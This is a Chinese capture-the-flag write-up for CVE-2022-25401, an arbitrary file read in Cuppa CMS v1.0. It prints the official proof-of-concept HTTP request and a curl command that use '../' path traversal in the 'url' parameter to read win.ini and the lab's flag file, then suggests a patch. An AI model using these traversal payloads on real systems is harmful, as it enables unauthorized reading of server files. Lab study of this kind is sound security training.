春秋云境CVE-2022-25401任意文件读取漏洞

目录

一、题目

二、curl访问flag文件

一、题目

介绍：

        Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞 

进入题目 是一个登录页面

sql和暴破都无解。

官方POC

 国家信息安全漏洞库

cve漏洞介绍

官方给错了目录 没有administrator/ 找不到

官方poc

 代码块：

1.  
   POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
2.  
   Host: 192.168.174.133
3.  
   User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
4.  
   Content-Length: 272
5.  
   Accept: */*
6.  
   Accept-Language: zh-CN,zh;q=0.9
7.  
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
8.  
   Origin: http://192.168.174.133
9.  
   Referer: http://192.168.174.133/cuppa_cms/administrator/
10.  
    X-Requested-With: XMLHttpRequest
11.  
    Accept-Encoding: gzip
12.  
     
13.  
    id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

 burp抓包改包：不过没成功：可能是目录问题。

二、curl访问flag文件

 进入目录templates/default/html/windows/right.php  

这里返回空白页是表示有这个文件的，如果不存在会返回404。

进入templates/default/html目录

 windows目录下right.php

 查看源码：

 kali的curl请求访问根目录下的flag文件

        curl是一种命令行工具,作用是发出网络请求,然后得到和提取数据,显示在"标准输出"(stdout)上面。 它支持多种协议 查看网页源码 直接在curl命令后加上网址,就可以看到网页源码。

curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"

 得到flag

flag{fa417734-dac9-4947-831f-67b3ed302120} 

附：

漏洞修复建议
在 ‘/templates/default/html/windows/right.php’ 文件处,第53行建议添加以下代码：

1.  
   $url = $_POST["url"];
2.  
   if(strstr($url, "../") || strstr($url, "..\\")){
3.  
       echo "Security attack!";
4.  
       exit;
5.  
   }
6.  
   include realpath(DIR . '/../../../..')."/".$url;

这篇好文章是转载于：学新通技术网